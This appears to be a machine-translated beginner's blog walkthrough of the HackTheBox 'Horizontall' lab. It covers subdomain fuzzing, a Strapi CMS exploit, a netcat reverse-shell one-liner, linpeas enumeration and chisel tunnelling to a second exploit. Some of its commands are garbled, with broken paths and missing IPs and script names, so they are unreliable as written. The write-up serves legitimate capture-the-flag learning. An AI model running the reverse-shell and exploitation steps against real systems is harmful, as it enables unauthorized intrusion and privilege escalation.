HTB Horizontall or how to reach heaven? # for the little ones


I start publishing machine solutions from HackTheBox. I hope this tutorial will be a small tip for those who are just starting their journey in ethical hacking. Let’s start ….

For successful passage you need:

  • Know what an exploit is

  • Be able to “correctly” google

As a result, we will find out:

  • How to search for an entry point

  • What is needed to escalate privileges

  • Why port forwarding has become so easy

Intelligence service

It is with reconnaissance that any attack on the target system begins. It is necessary to understand that it is generally possible to attack. We use a scanner nmap.

nmap -A -sC -sV -Pn -p-.

We got the following:

Any port is a potential entry point, but having little experience of staying at this site, I can say: “Port 22 is not our option“. Users here are intricate and their passwords are serious. Our goal is 80 port. Let’s go further ..

First, let’s add the IP of the attacked machine to the file / etc / hostswhat to apply for the domain name.

Fine! Let’s visit the website, maybe we can find something interesting …

I recommend skimming the page code. It may contain sensitive information (passwords, versions of the software used, useful links). Further enumeration of directories, but here, unfortunately, dirbuster cannot cope …

Any self-respecting company will use multiple domains for their own purposes. This is the next thing to check. Machines with HTB are in the vpn network, searching for subdomains through online services will definitely not lead to a result. The utility is perfect for this. wfuzz.

wfuzz -w subdomain.txt -u ‘http: //horizontall.htb/’ -H “Host: FUZZ.horizontall.htb” –hc 301

And after a while …

This subdomain must be added to the file / etc / hosts and immediately check for interesting directories.

gobusterdir -u http: //api-prod.horizontall.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt, php -e

Point of entry

CMS Strapi. A little google… Entry point found!

We apply an exploit.

python3 http: //api-prod.horizontall.htb/

The exploit works, the shell is there!

I immediately raise my local server (nc -nvlp 1234) and get a reverse shell (rm / tmp / f; mknod / tmp / fp; cat / tmp / f | / bin / sh -i 2> & 1 | nc 1234> / tmp / f). All back shells are given here… I used the command output via a file (rm / tmp / f; mknod / tmp / fp; cat / tmp / f), since with a normal connection (nc 1234), the command output is not displayed. This is due to the settings of the target system, namely, the fact that the user strapi does not have an interactive shell by default.

For convenience, let’s switch to bash.

python3 -c ‘import pty; pty.spawn (“/ bin / bash”)’

Privilege escalations

For privilege escalation, I use the project… Having previously raised the server (python3 -m http.server) and uploading it to the attacked machine (wget

Run the script and wait a couple of minutes

sh linpeas, sh

This script allows you to collect information about the system, versions of the software used, open ports, etc.

The database is mysql, but there might be something interesting on port 8000.

How to get through?

So, we come to the most important thing in this article. Port forwarding is a useful thing, but a little misunderstood. I used to forward as described here… For a successful forwarding, you must either find the user’s password or configure your ssh service (which is not configured by default).

The script coped with the task and found the password, but unfortunately it does not work

And there are a lot of problems with ssh browsing …

  • Timings

  • User cannot use ssh

  • Connections are logged

  • Ssh is usually watched

After surfing the Internet, I found interesting software that allows you to forward a port in a matter of seconds. Meet chisel. This software consists of two components: a server and a client. We raise the server on our site, and the client on the target system.

Don’t forget to give the client the right to execute.

It turns out that a kind of tunnel has been created between our machines. More details can be found in this video… Now let’s turn to port 8001, via localhost.

It didn’t take long to find the exploit on the Internet.

We use.

We get the shell as described above.

The wheelbarrow is completed! Happy hacking everyone.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *